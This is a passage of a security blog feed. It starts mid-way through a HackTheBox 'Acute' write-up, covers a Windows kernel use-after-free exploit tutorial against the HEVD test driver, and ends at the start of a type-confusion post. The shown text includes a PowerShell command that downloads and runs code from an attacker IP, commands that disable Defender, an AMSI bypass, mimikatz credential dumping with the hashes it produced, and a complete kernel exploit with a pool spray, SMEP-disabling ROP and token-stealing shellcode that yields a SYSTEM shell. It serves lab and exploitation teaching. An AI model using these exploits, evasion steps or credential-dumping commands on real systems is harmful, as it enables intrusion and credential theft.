$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock { iex(iwr http://10.10.14.7/run.txt -usebasicparsing) } -ComputerName Acute-PC01 -Credential $creds
...
[>] whoami
acute\jmorgan
[>] whoami /groups
...
BUILTIN\Administrators                     Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner

We can now disable AV & use mimikatz to dump the hashes on the system:

Add-MpPreference -ExclusionPath C:\temp
Set-MpPreference -DisableRealtimeMonitoring $true
iwr http://10.10.14.7/drop/mimikatz.exe -outfile mimikatz.exe

# bypass AMSI
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils"){$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

.\mimikatz.exe "token::elevate" "privilege::debug" "sekurlsa::logonpasswords" "lsadump::sam" "exit"
.\mimikatz.exe "token::elevate"  "lsadump::sam" "exit"
...
ACUTE-PC01$:   ea9815114ac78cdbb69ab9a39df66d73
Natasha:       29ab86c5c4d2aab957763e5c1720486d
Administrator: a29f7623fd11550def0192de9246f46b (cracks to [email protected])

The rest of the machine is not that interesting: the local administrator password on Acute-PC01 is reused by another user, awallace. With that user we get a shell on the DC and place a .bat file in the C:\Program files\keepmeon folder, which is periodically executed as lhopkins. lhopkins has GenericWrite on the Site_Admin group, which in turn has DA access. At this point you can add any of your already compromised users to that group (e.g. net group "Site_Admin" awallace /add) and are done.

The post Active Directory, JEA & Random Stuff – Acute @ HackTheBox appeared first on Vulndev.

Windows Kernel Exploitation – HEVD x64 Use-After-Free

By: xct
14 July 2022 at 19:48

This part will look at a Use-After-Free vulnerability in HEVD on Windows 11 x64.

Vulnerability Discovery


We are going to tackle this based on the source instead of the assembly again. There are 4 functions that are interesting for the UAF vulnerability:

  • AllocateUaFObjectNonPagedPool
  • FreeUaFObjectNonPagedPool
  • AllocateFakeObjectNonPagedPool
  • UseUaFObjectNonPagedPool

The general idea is that we allocate an object on the kernel heap (on the non-paged pool, which is an area of memory that can not be paged out) using AllocateUaFObjectNonPagedPool. Then we call FreeUaFObjectNonPagedPool which will free the object. If done correctly, there should be no references to the object left in the kernel – this is however not the case here. On allocate, a global variable g_UseAfterFreeObjectNonPagedPool is set to the address of the object:

NTSTATUS AllocateUaFObjectNonPagedPool(VOID) {
    ...
    UseAfterFree = (PUSE_AFTER_FREE_NON_PAGED_POOL) ExAllocatePoolWithTag(NonPagedPool, sizeof(USE_AFTER_FREE_NON_PAGED_POOL), (ULONG)POOL_TAG);
    ...
    g_UseAfterFreeObjectNonPagedPool = UseAfterFree;
    ...  
}

Then when the object gets freed, this reference does not get set to NULL, so it is still pointing to the now freed memory.

NTSTATUS FreeUaFObjectNonPagedPool(VOID){
    ...
    ExFreePoolWithTag((PVOID)g_UseAfterFreeObjectNonPagedPool, (ULONG)POOL_TAG);
    ...
}

This in itself would not be a huge issue but this global variable is actually being used by UseUaFObjectNonPagedPool which is running a method called Callback on it:

NTSTATUS UseUaFObjectNonPagedPool(VOID) {
    ...
    if (g_UseAfterFreeObjectNonPagedPool->Callback) {
        g_UseAfterFreeObjectNonPagedPool->Callback();
    }
    ...
}

When the global object has been freed and this function is invoked, we get undefined behavior. One possibility is that another object of the same size takes its place, and the driver then attempts to call the Callback function on the new object instead (which for a random object will likely fail, since its memory layout will be completely different). HEVD has an AllocateFakeObjectNonPagedPool function that conveniently allows us to create a user-controlled object of the same size. There is, however, the issue of getting it exactly into the spot of the object that was just freed: Windows randomizes heap allocations, so a new allocation could end up anywhere.

Exploitation

Before starting with any exploitation we have to understand where our object is, how big it is and what a replacement object should look like. We also need to find a way to fill the hole with our object which is not straightforward.

We start with some template code that just allocates the object, triggers a breakpoint, and then frees the object again should we let execution continue:

#include <stdio.h>
#include <Windows.h>

#define ALLOCATE_UAF_IOCTL 0x222013
#define FREE_UAF_IOCTL 0x22201B
#define USE_UAF_IOCTL 0x222017

int main() {
    DWORD bytesWritten;
    HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
        exit(1);
    }    
    
    // Allocate UAF Object
    DeviceIoControl(hDriver, ALLOCATE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL);
    // Debug
    DebugBreak();
    // Free UAF Object
    DeviceIoControl(hDriver, FREE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL);

    return 0;
}
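The IOCTL constants in the template are not arbitrary: they follow the CTL_CODE bit layout from the Windows headers (device type, access, function, method). The short Python sketch below decodes them; the function name decode_ioctl is made up for illustration.

```python
def decode_ioctl(code):
    """Split an IOCTL code into its CTL_CODE fields."""
    return {
        "device_type": (code >> 16) & 0xFFFF,  # 0x22 == FILE_DEVICE_UNKNOWN
        "access": (code >> 14) & 0x3,          # 0 == FILE_ANY_ACCESS
        "function": (code >> 2) & 0xFFF,
        "method": code & 0x3,                  # 3 == METHOD_NEITHER
    }

if __name__ == "__main__":
    for name, code in [
        ("ALLOCATE_UAF_IOCTL", 0x222013),
        ("USE_UAF_IOCTL", 0x222017),
        ("FREE_UAF_IOCTL", 0x22201B),
    ]:
        fields = decode_ioctl(code)
        print(name, {k: hex(v) for k, v in fields.items()})
```

Decoded this way, the three codes only differ in their function number (0x804, 0x805 and 0x806).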

We saw in the allocate function earlier that it allocates the object in the non-paged pool using ExAllocatePoolWithTag. The tag it uses (here “Hack”) is a way to identify objects in that pool. We can search for all objects tagged this way in the debugger:

0: kd> !poolused 2 Hack
...
               NonPaged                  Paged
 Tag     Allocs         Used     Allocs         Used

 Hack         1          112          0            0	UNKNOWN pooltag 'Hack', please update pooltag.txt

TOTAL         1          112          0            0

This shows that currently there is exactly one allocation with that tag (the one we just created ourselves). Let’s now find the address of that object:

0: kd> !poolfind Hack -nonpaged
ffffe60269102050 : tag Hack, size      0x60, Nonpaged pool

This works but can take a lot of time. An alternative is to catch the allocations while they happen by setting ed nt!PoolHitTag 'Hack'. For now, we are going to stick with the address we just got from poolfind. It shows us that the size of the object is 0x60 (plus a 0x10-byte header), which means that we later need to find some native Windows kernel object that has the same size.

0: kd> dq ffffe60269102050 L0xC
ffffe602`69102050  fffff800`31117c58 41414141`41414141
ffffe602`69102060  41414141`41414141 41414141`41414141
ffffe602`69102070  41414141`41414141 41414141`41414141
ffffe602`69102080  41414141`41414141 41414141`41414141
ffffe602`69102090  41414141`41414141 41414141`41414141
ffffe602`691020a0  41414141`41414141 00000000`00414141

We can see that this object is mostly filled with “A”s. Only the first value is a function pointer, and this is exactly the callback we identified in the introduction section. If we compare that with the object definition in the source, it matches our assumption:

typedef struct _USE_AFTER_FREE_NON_PAGED_POOL {
    FunctionPointer Callback;
    CHAR Buffer[0x54];
} USE_AFTER_FREE_NON_PAGED_POOL, *PUSE_AFTER_FREE_NON_PAGED_POOL;

You might have noticed that the size does not exactly add up to 0x60 when looking at this object (0x54 + 8 = 0x5C). The remaining 4 bytes I assume are padding (we can see they are zero). Now that we know the size, we can look for another kernel object that is suitable for us.

There is some excellent research by Alex Ionescu on Kernel Fengshui which dives into this topic and shows that using CreatePipe and WriteFile allows allocating an object of almost arbitrary size (> 0x48) in the non-paged pool. Let’s create such an object and try to find it in memory so we can confirm it indeed has the correct size.
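The padding assumption can be sanity-checked without a debugger. The following Python sketch rebuilds the structure with ctypes and lets the usual alignment rules compute the size. It assumes a 64-bit Python (so that a pointer is 8 bytes, as in the x64 kernel) and uses the 0x10-byte pool header mentioned above; the class name UseAfterFreeObject is only illustrative.

```python
import ctypes

class UseAfterFreeObject(ctypes.Structure):
    # Mirrors USE_AFTER_FREE_NON_PAGED_POOL from the HEVD source.
    _fields_ = [
        ("Callback", ctypes.c_void_p),     # function pointer
        ("Buffer", ctypes.c_char * 0x54),  # CHAR Buffer[0x54]
    ]

POOL_HEADER_SIZE = 0x10  # header size taken from the text above

if __name__ == "__main__":
    raw = ctypes.sizeof(ctypes.c_void_p) + 0x54
    padded = ctypes.sizeof(UseAfterFreeObject)
    print("fields only :", hex(raw))
    print("with padding:", hex(padded))
    print("with header :", padded + POOL_HEADER_SIZE, "bytes")
```

On a 64-bit interpreter the structure is rounded up to a multiple of the pointer alignment, which accounts for the 4 trailing bytes, and adding the header gives the 112 bytes reported in the Used column of !poolused.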

void Error(const char* name) {
    printf("%s Error: %d\n", name, GetLastError());
    exit(-1);
}

typedef struct PipeHandles {
    HANDLE read;
    HANDLE write;
} PipeHandles;

PipeHandles CreatePipeObject() {
    DWORD ALLOC_SIZE = 0x70;
    BYTE uBuffer[0x28]; // ALLOC_SIZE - HEADER_SIZE (0x48)
    HANDLE readPipe = NULL;
    HANDLE writePipe = NULL;
    DWORD resultLength;

    RtlFillMemory(uBuffer, 0x28, 0x41);
    if (!CreatePipe(&readPipe, &writePipe, NULL, sizeof(uBuffer))) {
        Error("CreatePipe");
    }
   
    if (!WriteFile(writePipe, uBuffer, sizeof(uBuffer), &resultLength, NULL)) {
        Error("WriteFile");
    }  
    return PipeHandles{ readPipe, writePipe };
}

After adding the function to create such pipe objects we can now create one in our main function:

int main() {
   ...
   PipeHandles pipeHandle = CreatePipeObject();
   printf("[>] Handles: 0x%llx, 0x%llx\n", pipeHandle.read, pipeHandle.write);
   getchar();
   DebugBreak();
}

When we run this, we get the handles to the pipes printed out, allowing us to inspect them:

C:\Users\xct\Desktop>exploit.exe
[>] Handles: 0xa8, 0xac
1: kd> !handle 0xa8
PROCESS ffffe6026dceb080
    SessionId: 1  Cid: 18c0    Peb: 27c6f1f000  ParentCid: 10e8
    DirBase: 1ad85d000  ObjectTable: ffff968b91808b00  HandleCount:  43.
    Image: exploit.exe

Handle table at ffff968b91808b00 with 43 entries in use
00a8: Object: ffffe602706bda30  GrantedAccess: 00120189 Entry: ffff968b8f5ff2a0
Object: ffffe602706bda30  Type: (ffffe602696fa7a0) File
    ObjectHeader: ffffe602706bda00 (new version)
        HandleCount: 1  PointerCount: 32768

We can see that it is a file object, that it’s used by our process, and the address it is at. Let’s inspect the memory further:

1: kd> !address ffffe602706bda30
...
Usage:                  
Base Address:           ffffcb8a`6b5d5000
End Address:            fffff780`00000000
Region Size:            00002bf5`94a2b000
VA Type:                SystemRange

1: kd> !pool ffffe602706bda30
Pool page ffffe602706bda30 region is Nonpaged pool
 ffffe602706bd050 size:  190 previous size:    0  (Allocated)  File
 ffffe602706bd1e0 size:  190 previous size:    0  (Allocated)  File
 ffffe602706bd370 size:  190 previous size:    0  (Free)       File
 ffffe602706bd500 size:  190 previous size:    0  (Allocated)  File
 ffffe602706bd690 size:  190 previous size:    0  (Allocated)  File
 ffffe602706bd820 size:  190 previous size:    0  (Allocated)  File
*ffffe602706bd9b0 size:  190 previous size:    0  (Allocated) *File
		Pooltag File : File objects
 ffffe602706bdb40 size:  190 previous size:    0  (Allocated)  File
 ffffe602706bdcd0 size:  190 previous size:    0  (Allocated)  File
 ffffe602706bde60 size:  190 previous size:    0  (Allocated)  File

We can see here that the object is in the nonpaged pool, but its size is 0x190, which is not quite what we are looking for. So what is going on? We are not really looking for the file object itself but for the DATA_ENTRY object that is created, which is an undocumented structure. These objects are allocated with the tag “NpFr”. Let’s try to find it:

1: kd> !poolused 2 NpFr
Using a machine size of 1ffe4d pages to configure the kd cache
..
 Sorting by NonPaged Pool Consumed

               NonPaged                  Paged
 Tag     Allocs         Used     Allocs         Used

 NpFr         1          112          0            0	DATA_ENTRY records (read/write buffers) , Binary: npfs.sys

TOTAL         1          112          0            0
1: kd> !poolfind NpFr -nonpaged
...

There is again exactly one, which we just allocated. Finding the exact object in memory turned out to be a bit difficult, since poolfind failed to find it on my end. The general structure of this DATA_ENTRY object looks like this, followed by the actual data:

typedef struct _NP_DATA_QUEUE_ENTRY {
    LIST_ENTRY QueueEntry;
    ULONG DataEntryType;
    PIRP Irp;
    ULONG QuotaInEntry;
    PSECURITY_CLIENT_CONTEXT ClientSecurityContext;
    ULONG DataSize;
} NP_DATA_QUEUE_ENTRY, *PNP_DATA_QUEUE_ENTRY;

These DATA_ENTRY objects will be placed in the nonpaged pool and we can control their size, which solves part of what we are trying to achieve. The next problem is that when we trigger the free in the driver and create a “hole” in memory, we cannot control what is going to fill that hole. After all, the kernel is very busy and could place some other object that fits there. Even if we were faster than the kernel at allocating an object of the correct size, we would still not be guaranteed to fill the spot that we freed, since heap allocations on modern Windows are randomized.

A way to get around that is to spray the heap with a lot of these holes, surrounded by allocations we control. This gives us a good chance to get our UAF object into one of those. After allocating and freeing the object via the vulnerable driver we allocate a huge amount of fake objects (fake objects being the ones we can create via AllocateFakeObjectNonPagedPool) to have a good chance to fill the exact hole the UAF object left.

To summarize:

  • Allocate a lot of DATA_ENTRY objects (CreatePipe + WriteFile)
  • Free every 2nd DATA_ENTRY object to create a lot of holes
  • Allocate the UAF object and Free it (this will likely happen in one of the holes we just created)
  • Allocate a lot of fake objects to fill every hole (including the one we have to hit to successfully exploit it)
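The four steps above can be played through in a toy model before touching the kernel. The Python sketch below simulates a pool as a list of slots with a randomized allocator and checks whether a fake object ends up in the slot the dangling pointer refers to. It is a heavily simplified model under my own assumptions (uniform slot size, no other kernel activity, purely random placement), not a description of the real Windows pool allocator.

```python
import random

def simulate_groom(slots=1000, fake_objects=500, seed=0):
    """Return True if a fake object lands in the slot the UAF object used."""
    rng = random.Random(seed)
    pool = ["pipe"] * slots               # 1. spray DATA_ENTRY-like objects
    for i in range(0, slots, 2):          # 2. free every 2nd object
        pool[i] = None
    holes = [i for i, obj in enumerate(pool) if obj is None]
    dangling = rng.choice(holes)          # 3. UAF object lands in some hole...
    pool[dangling] = "uaf"
    pool[dangling] = None                 #    ...and is freed; the driver keeps the pointer
    rng.shuffle(holes)                    # 4. fake objects fill holes in random order
    for i in holes[:fake_objects]:
        pool[i] = "fake"
    return pool[dangling] == "fake"

if __name__ == "__main__":
    for count in (125, 250, 500):
        hits = sum(simulate_groom(1000, count, seed=s) for s in range(200))
        print(f"{count} fake objects: {hits}/200 runs reclaimed the UAF slot")
```

In this model the hit rate grows with the share of holes that get refilled, which is the intuition behind allocating as many fake objects as there are holes.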

This leads us to the following code:

#include <stdio.h>
#include <Windows.h>
#include <vector>

#define QWORD ULONGLONG

#define ALLOCATE_UAF_IOCTL 0x222013
#define FREE_UAF_IOCTL 0x22201B
#define USE_UAF_IOCTL 0x222017
#define FAKE_OBJECT_IOCTL 0x22201F

void Error(const char* name) {
    printf("%s Error: %d\n", name, GetLastError());
    exit(-1);
}

typedef struct PipeHandles {
    HANDLE read;
    HANDLE write;
} PipeHandles;

PipeHandles CreatePipeObject() {
    DWORD ALLOC_SIZE = 0x70;
    BYTE uBuffer[0x28]; // ALLOC_SIZE - HEADER_SIZE (0x48)
    BOOL res = FALSE;
    HANDLE readPipe = NULL;
    HANDLE writePipe = NULL;
    DWORD resultLength;

    RtlFillMemory(uBuffer, 0x28, 0x41);
    if (!CreatePipe(&readPipe, &writePipe, NULL, sizeof(uBuffer))) {
        Error("CreatePipe");
    }

    if (!WriteFile(writePipe, uBuffer, sizeof(uBuffer), &resultLength, NULL)) {
        Error("WriteFile");
    }
    return PipeHandles{ readPipe, writePipe };
}

int main() {
    DWORD bytesWritten;
    HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        Error("CreateFile");
    }

    printf("[>] Spraying objects for pool defragmentation..\n");
    std::vector<PipeHandles> defragPipeHandles;
    for (int i = 0; i < 20000; i++) {
        PipeHandles pipeHandle = CreatePipeObject();
        defragPipeHandles.push_back(pipeHandle);
    }

    printf("[>] Spraying objects in sequential allocation..\n");
    std::vector<PipeHandles> seqPipeHandles;
    for (int i = 0; i < 60000; i++) {
        PipeHandles pipeHandle = CreatePipeObject();
        seqPipeHandles.push_back(pipeHandle);
    }

    printf("[>] Creating object holes..\n");
    for (int i = 0; i < seqPipeHandles.size(); i++) {
        if (i % 2 == 0) {
            PipeHandles handles = seqPipeHandles[i];
            CloseHandle(handles.read);
            CloseHandle(handles.write);
        }
    }

    printf("[>] Allocating UAF Object\n");
    if (!DeviceIoControl(hDriver, ALLOCATE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL)) {
        //Error("Allocate UAF Object");
    }

    printf("[>] Freeing UAF Object\n");
    if (!DeviceIoControl(hDriver, FREE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL)) {
        Error("Free UAF Object");
    }

    printf("[>] Filling holes with custom objects..\n");
    BYTE uBuffer[0x60] = { 0 };
    *(QWORD*)(uBuffer) = (QWORD)(0xdeadc0de);
    for (int i = 0; i < 30000; i++) {
        if (!DeviceIoControl(hDriver, FAKE_OBJECT_IOCTL, uBuffer, sizeof(uBuffer), NULL, 0, &bytesWritten, NULL)) {
            Error("Allocate Custom Object");
        }
    }

    printf("[>] Triggering callback on UAF object..\n");
    if (!DeviceIoControl(hDriver, USE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL)) {
        Error("Use UAF Object");
    }
    return 0;
}

Running the updated PoC shows that this indeed works and places 0xdeadc0de in RIP:

Access violation - code c0000005 (!!! second chance !!!)
00000000`deadc0de ??              ???

At this point exploiting the vulnerability is exactly the same process as in the last post about the type-confusion vulnerability. We pivot the stack to a location we control and make sure it’s paged in. Then we use ROP to disable SMEP & jump to our shellcode. For details about how to do this please refer to the last post – we use exactly the same gadgets & shellcode. The updated PoC looks as follows:

#include <stdio.h>
#include <Windows.h>
#include <vector>
#include <winternl.h>
#include <Psapi.h>

#define QWORD ULONGLONG

#define ALLOCATE_UAF_IOCTL 0x222013
#define FREE_UAF_IOCTL 0x22201B
#define USE_UAF_IOCTL 0x222017
#define FAKE_OBJECT_IOCTL 0x22201F

BYTE sc[256] = {
  0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
  0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
  0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
  0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
  0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
  0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
  0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
  0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
  0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
  0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
  0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
  0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
  0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
  0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff
};

void Error(const char* name) {
    printf("%s Error: %d\n", name, GetLastError());
    exit(-1);
}

typedef struct PipeHandles {
    HANDLE read;
    HANDLE write;
} PipeHandles;

PipeHandles CreatePipeObject() {
    DWORD ALLOC_SIZE = 0x70;
    BYTE uBuffer[0x28]; // ALLOC_SIZE - HEADER_SIZE (0x48)
    BOOL res = FALSE;
    HANDLE readPipe = NULL;
    HANDLE writePipe = NULL;
    DWORD resultLength;

    RtlFillMemory(uBuffer, 0x28, 0x41);
    if (!CreatePipe(&readPipe, &writePipe, NULL, sizeof(uBuffer))) {
        Error("CreatePipe");
    }

    if (!WriteFile(writePipe, uBuffer, sizeof(uBuffer), &resultLength, NULL)) {
        Error("WriteFile");
    }
    return PipeHandles{ readPipe, writePipe };
}

QWORD getBaseAddr(LPCWSTR drvName) {
    LPVOID drivers[512];
    DWORD cbNeeded;
    int nDrivers, i = 0;
    if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
        WCHAR szDrivers[512];
        nDrivers = cbNeeded / sizeof(drivers[0]);
        for (i = 0; i < nDrivers; i++) {
            if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
                if (wcscmp(szDrivers, drvName) == 0) {
                    return (QWORD)drivers[i];
                }
            }
        }
    }
    return 0;
}

int main() {
    DWORD bytesWritten;
    HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        Error("CreateFile");
    }

    printf("[>] Spraying objects for pool defragmentation..\n");
    std::vector<PipeHandles> defragPipeHandles;
    for (int i = 0; i < 20000; i++) {
        PipeHandles pipeHandle = CreatePipeObject();
        defragPipeHandles.push_back(pipeHandle);
    }

    printf("[>] Spraying objects in sequential allocation..\n");
    std::vector<PipeHandles> seqPipeHandles;
    for (int i = 0; i < 60000; i++) {
        PipeHandles pipeHandle = CreatePipeObject();
        seqPipeHandles.push_back(pipeHandle);
    }

    printf("[>] Creating object holes..\n");
    for (int i = 0; i < seqPipeHandles.size(); i++) {
        if (i % 2 == 0) {
            PipeHandles handles = seqPipeHandles[i];
            CloseHandle(handles.read);
            CloseHandle(handles.write);
        }
    }

    printf("[>] Allocating UAF Object\n");
    if (!DeviceIoControl(hDriver, ALLOCATE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL)) {
        //Error("Allocate UAF Object");
    }

    printf("[>] Freeing UAF Object\n");
    if (!DeviceIoControl(hDriver, FREE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL)) {
        Error("Free UAF Object");
    }

    printf("[>] Filling holes with custom objects..\n");    
    LPVOID shellcode = VirtualAlloc(NULL, 256, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    RtlCopyMemory(shellcode, sc, 256);

    QWORD ntBase = getBaseAddr(L"ntoskrnl.exe");
    QWORD STACK_PIVOT_ADDR = 0x48000000;
    QWORD STACK_PIVOT_GADGET = ntBase + 0x317f70; // mov esp, 0x48000000; add esp, 0x28; ret; 
    QWORD POP_RCX = ntBase + 0x20a386;
    QWORD MOV_CR4_RCX = ntBase + 0x3acd47;
    int index = 0;

    QWORD stackAddr = STACK_PIVOT_ADDR - 0x1000;
    LPVOID kernelStack = VirtualAlloc((LPVOID)stackAddr, 0x14000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!VirtualLock(kernelStack, 0x14000)) {
        Error("VirtualLock");
    }

    RtlFillMemory((LPVOID)STACK_PIVOT_ADDR, 0x28, '\x41');
    QWORD* rop = (QWORD*)((QWORD)STACK_PIVOT_ADDR + 0x28);

    *(rop + index++) = POP_RCX;
    *(rop + index++) = 0x350ef8 ^ 1UL << 20;
    *(rop + index++) = MOV_CR4_RCX;
    *(rop + index++) = (QWORD)shellcode;    
    
    BYTE uBuffer[0x60] = { 0 };
    *(QWORD*)(uBuffer) = (QWORD)(STACK_PIVOT_GADGET);

    for (int i = 0; i < 30000; i++) {
        if (!DeviceIoControl(hDriver, FAKE_OBJECT_IOCTL, uBuffer, sizeof(uBuffer), NULL, 0, &bytesWritten, NULL)) {
            Error("Allocate Custom Object");
        }
    }

    printf("[>] Triggering callback on UAF object..\n");
    if (!DeviceIoControl(hDriver, USE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL)) {
        Error("Use UAF Object");
    }
    system("cmd.exe");
    return 0;
}

This gives us a shell as SYSTEM.

Resources

The post Windows Kernel Exploitation – HEVD x64 Use-After-Free appeared first on Vulndev.

Windows Kernel Exploitation – HEVD x64 Type Confusion

By: xct
10 July 2022 at 12:14

In the last post, we looked at a Stack Overflow in HEVD on Windows 11 x64. Now we are going to continue with a Type Confusion vulnerability.

Overview

Target: HEVD
OS/Arch: Windows 11 x64
Protections: ASLR, DEP, SMEP

Vulnerability Discovery

We are going over the vulnerability briefly and will focus more on the exploitation part. The source shows the following 2 objects:

typedef struct _USER_TYPE_CONFUSION_OBJECT {
    ULONG_PTR ObjectID;
    ULONG_PTR ObjectType;
} USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT;

typedef struct _KERNEL_TYPE_CONFUSION_OBJECT {
    ULONG_PTR ObjectID;
    union {
        ULONG_PTR ObjectType;
        FunctionPointer Callback;
    };
} KERNEL_TYPE_CONFUSION_OBJECT, *PKERNEL_TYPE_CONFUSION_OBJECT;

On the kernel object, we see a union of an object type and a callback, which means that there is only space for one of them, or in other words, using either of those members when accessing the struct will point to the same value. On the user object, on the other hand, we do not have this union and only have ObjectID and ObjectType.
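
To make the aliasing concrete, here is a minimal user-mode sketch. KernelObjectModel is a hypothetical stand-in for the kernel structure, with uintptr_t in place of ULONG_PTR and a plain function pointer in place of the FunctionPointer typedef. It only illustrates the memory layout and does not touch the driver.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>

// Hypothetical user-mode mirror of the kernel object (illustration only).
struct KernelObjectModel {
    std::uintptr_t ObjectID;
    union {
        std::uintptr_t ObjectType;
        void (*Callback)();
    };
};

// Both union members start at the same offset inside the struct.
bool members_share_offset() {
    return offsetof(KernelObjectModel, ObjectType) ==
           offsetof(KernelObjectModel, Callback);
}

// Store a value through ObjectType, then return the raw bits found at the
// location of Callback. memcpy is used so the sketch stays well-defined C++.
std::uintptr_t callback_bits_after_type_write(std::uintptr_t type_value) {
    KernelObjectModel obj{};
    obj.ObjectType = type_value;
    std::uintptr_t bits = 0;
    const unsigned char* raw = reinterpret_cast<const unsigned char*>(&obj);
    std::memcpy(&bits, raw + offsetof(KernelObjectModel, Callback), sizeof(bits));
    return bits;
}
```

Whatever is written to ObjectType comes back unchanged when the same bytes are read as Callback, which is exactly what the driver relies on when it later calls the callback.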

The user object structure can be passed to the driver via an IOCTL and will then be used in the following way:

NTSTATUS TriggerTypeConfusion(_In_ PUSER_TYPE_CONFUSION_OBJECT UserTypeConfusionObject) {
    ...
    KernelTypeConfusionObject = (PKERNEL_TYPE_CONFUSION_OBJECT)ExAllocatePoolWithTag(
            NonPagedPool,
            sizeof(KERNEL_TYPE_CONFUSION_OBJECT),
            (ULONG)POOL_TAG
    );
    KernelTypeConfusionObject->ObjectID = UserTypeConfusionObject->ObjectID;
    KernelTypeConfusionObject->ObjectType = UserTypeConfusionObject->ObjectType;
    ...
    Status = TypeConfusionObjectInitializer(KernelTypeConfusionObject);
    ...
}

The TypeConfusionObjectInitializer function then calls the Callback member. Because Callback shares its storage with ObjectType, it holds the value we supplied in the ObjectType field of the user object. This means the driver will call whatever function pointer we place in ObjectType.

NTSTATUS TypeConfusionObjectInitializer(_In_ PKERNEL_TYPE_CONFUSION_OBJECT KernelTypeConfusionObject) {
    NTSTATUS Status = STATUS_SUCCESS;
    KernelTypeConfusionObject->Callback();
    return Status;
}

The IOCTL number for this call is 0x222023, which can be found in a similar way to the last post.

Exploitation

We start by writing a simple exploit template that defines the required structure, gets a handle to the driver, and calls the IOCTL with a dummy value:

#include <stdio.h>
#include <Windows.h>

typedef struct _UserObject {
    ULONG_PTR ObjectID;
    ULONG_PTR ObjectType;
} UserObject;

int main() {
